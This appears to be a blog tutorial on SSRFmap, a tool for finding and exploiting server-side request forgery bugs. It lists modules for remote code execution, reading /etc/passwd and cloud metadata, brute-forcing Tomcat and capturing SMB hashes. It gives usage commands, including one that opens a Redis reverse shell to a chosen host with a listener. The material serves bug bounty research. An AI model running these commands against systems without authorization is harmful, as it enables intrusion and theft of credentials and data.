SSRFmap – Automatic SSRF Fuzzer and Exploitation Tool

SSRFmap - Automatic SSRF Fuzzer and Exploitation Tool

SSRF Tool

In the realm of cybersecurity, the identification and remediation of vulnerabilities are paramount. Bug bounty programs play a pivotal role in this process, as they incentivize security researchers to discover and report vulnerabilities in exchange for rewards. One tool that has gained significant attention in bug bounty hunting circles is SSRFMap. Short for Server Side Request Forgery Mapping, SSRFMap empowers security researchers to efficiently detect and exploit Server Side Request Forgery (SSRF) vulnerabilities.

Understanding SSRF Vulnerabilities

Before delving into SSRFMap, let’s briefly discuss SSRF vulnerabilities. SSRF refers to a type of security vulnerability that allows an attacker to send crafted requests from the target server to other internal or external resources. These requests can include HTTP, DNS, or other protocols. Exploiting SSRF vulnerabilities can lead to critical consequences such as unauthorized access to internal resources, bypassing firewall restrictions, or even compromising the entire network.

What is SSRFmap?

SSRFMap is an open-sources SSRF tool. It aims to automate the detection and exploitation of SSRF vulnerabilities. The tool is built using the Python programming language and offers a user-friendly command-line interface, allowing security researchers to efficiently identify SSRF-prone endpoints within the target application or network.

SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

SSRF Tool Key Features and Functionality

  1. URL Fuzzing: SSRFMap uses URL fuzzing techniques to discover SSRF vulnerabilities in the target application. By manipulating the URLs and payloads sent to the server, the tool attempts to provoke responses that indicate potential SSRF vulnerabilities.
  2. Comprehensive Protocol Support: SSRFMap supports various protocols, including HTTP, FTP, DNS, Redis, MySQL, and more. This versatility enables researchers to detect SSRF vulnerabilities across a wide range of potential attack vectors.
  3. Automated Scan: SSRFMap automates the scanning process, reducing manual effort and increasing efficiency. The tool can analyze multiple URLs simultaneously, rapidly iterating through a large number of endpoints to identify SSRF-prone targets.
  4. Response Analysis: Upon receiving responses from the target server, SSRFMap analyzes them to determine potential SSRF vulnerabilities. It can identify different response patterns, error messages, and redirects that may indicate the presence of SSRF.
  5. Reporting and Collaboration: SSRFMap generates detailed reports containing vulnerable URLs, HTTP request/response details, and any discovered SSRF payloads. Researchers can utilize these reports to present their findings and collaborate with application developers or bug bounty platforms.

Modules

The following modules are already implemented and can be used with the -m argument.

NameDescription
fastcgiFastCGI RCE
redisRedis RCE
githubGithub Enterprise RCE < 2.8.7
zabbixZabbix RCE
mysqlMySQL Command execution
dockerDocker Infoleaks via API
smtpSMTP send mail
portscanScan top 8000 ports for the host
networkscanHTTP Ping sweep over the network
readfilesRead files such as /etc/passwd
alibabaRead files from the provider (e.g: meta-data, user-data)
awsRead files from the provider (e.g: meta-data, user-data)
gceRead files from the provider (e.g: meta-data, user-data)
digitaloceanRead files from the provider (e.g: meta-data, user-data)
socksproxySOCKS4 Proxy
smbhashForce an SMB authentication via a UNC Path
tomcatBruteforce attack against Tomcat Manager
customSend custom data to a listening service, e.g: netcat
memcacheStore data inside the memcache instance

Install SSRFmap

SSRFMap is an open-source ssrf tool that can be installed on various operating systems. Here’s a step-by-step guide on how to install SSRFmap:


Note: SSRFmap require Python3 so ensure that you have Python 3.x installed on your system. You can download Python from the official Python website (https://www.python.org).

Basic install from the Github repository.

$ git clone https://github.com/swisskyrepo/SSRFmap $ cd SSRFmap/ $ pip3 install -r requirements.txt $ python3 ssrfmap.py

How to Use SSRFmap?

First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap. They should look like the following. More examples are available in the /data folder.

POST /ssrf HTTP/1.1 Host: 127.0.0.1:5000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://mysimple.ssrf/ Content-Type: application/x-www-form-urlencoded Content-Length: 31 Connection: close Upgrade-Insecure-Requests: 1url=https%3A%2F%2Fwww.google.fr

Launch a portscan on localhost and read default files

Use the -m followed by module name (separated by a , if you want to launch several modules).

python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

Launch a portscan against an HTTPS endpoint using a custom user-agent

If you need to have a custom user-agent use the --uagent. Some targets will use HTTPS, you can enable it with --ssl.

python ssrfmap.py -r data/request.txt -p url -m portscan –ssl –uagent “SSRFmapAgent”

Triggering a reverse shell on a Redis

Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.

python ssrfmap.py -r data/request.txt -p url -m redis –lhost=127.0.0.1 –lport=4242 -l 4242# -l create a listener for reverse shell on the specified port # –lhost and –lport work like in Metasploit, these values are used to create a reverse shell payload

Why Automated SSRF Tool Matters in Bug Bounty Hunting

SSRF vulnerabilities are frequently exploited by attackers to gain unauthorized access or pivot within a network. The presence of SSRF in an application poses a significant risk to both users and data security. SSRFMap equips security researchers with a powerful tool to systematically detect and exploit SSRF vulnerabilities, enabling them to:

  1. Improve Detection Efficiency: SSRF Tool automates the scanning process, saving valuable time and effort for security researchers. It enables them to assess a larger attack surface and identify potential vulnerabilities efficiently.
  2. Strengthen Application Security: By using SSRF Tool, security researchers can provide valuable insights to application developers and organizations about the presence of SSRF vulnerabilities. This information allows developers to patch or mitigate the vulnerabilities, enhancing the overall security posture of the application.
  3. Foster Collaboration: SSRF Tool reporting capabilities facilitate effective communication between security researchers, developers, and bug bounty platforms.


You May Also Like

Leave a Reply

Your email address will not be published. Required fields are marked *

3 × four =